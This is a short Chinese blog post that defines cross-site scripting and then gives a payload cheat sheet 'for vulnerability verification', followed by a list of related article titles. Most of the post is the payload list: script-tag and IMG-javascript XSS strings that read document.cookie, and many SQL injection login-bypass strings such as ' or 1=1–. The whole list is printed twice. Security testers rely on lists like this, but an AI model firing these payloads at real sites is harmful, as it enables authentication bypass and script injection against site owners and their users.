XSS漏洞验证语句
2012-01-31 13:39
351 查看
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
相关测试代码,可供漏洞验证:
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<IMG SRC=”javascript:alert(’XSS’);”>
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
admin’–
’ or 0=0 –
“ or 0=0 –
or 0=0 –
’ or 0=0 #
“ or 0=0 #
or 0=0 #
’ or ’x’=’x
“ or ”x”=”x
’) or (’x’=’x
’ or 1=1–
“ or 1=1–
or 1=1–
’ or a=a–
“ or ”a”=”a
’) or (’a’=’a
“) or (“a”=”a
hi” or ”a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ’a’=’a
hi’) or (’a’=’a
hi”) or (“a”=”a
相关测试代码,可供漏洞验证:
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<IMG SRC=”javascript:alert(’XSS’);”>
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
admin’–
’ or 0=0 –
“ or 0=0 –
or 0=0 –
’ or 0=0 #
“ or 0=0 #
or 0=0 #
’ or ’x’=’x
“ or ”x”=”x
’) or (’x’=’x
’ or 1=1–
“ or 1=1–
or 1=1–
’ or a=a–
“ or ”a”=”a
’) or (’a’=’a
“) or (“a”=”a
hi” or ”a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ’a’=’a
hi’) or (’a’=’a
hi”) or (“a”=”a
相关文章推荐
- Sql语句密码验证的安全漏洞
- Sql语句密码验证的安全漏洞
- Sql语句密码验证的安全漏洞
- ZT-XSS 漏洞使用语句部分总结
- XSS 漏洞验证的方式
- 简易的JS验证FORM表单特殊字符,防范SQL语句漏洞
- Sql语句密码验证漏洞
- Sql语句密码验证的漏洞
- 微软最新账户身份验证漏洞分析-20160407-邮箱跳转后的XSS
- Discuz7.X爆注册验证码提取XSS跨站漏洞 金山、卡巴等大型论坛也无一避免
- 第四章:iOS应用漏洞利用 ——4.14 UIWebViews与XSS
- XSS漏洞演示
- 快速、直接的XSS漏洞检测爬虫 – XSScrapy
- 网易博客的60余个事件触发式漏洞与30余个XSS利用程式
- XSS漏洞定位和修复方法——htmlspecialchars() 函数
- xss安全漏洞分析以及项目实施解决方案
- Linux内核通杀提权漏洞CVE-2016-5195验证
- XSS 专题三 发掘XSS漏洞剖析
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入XSS-简介、跨站脚本检测和常见的攻击利用手段
- 浅析XSS(Cross Site Script)漏洞原理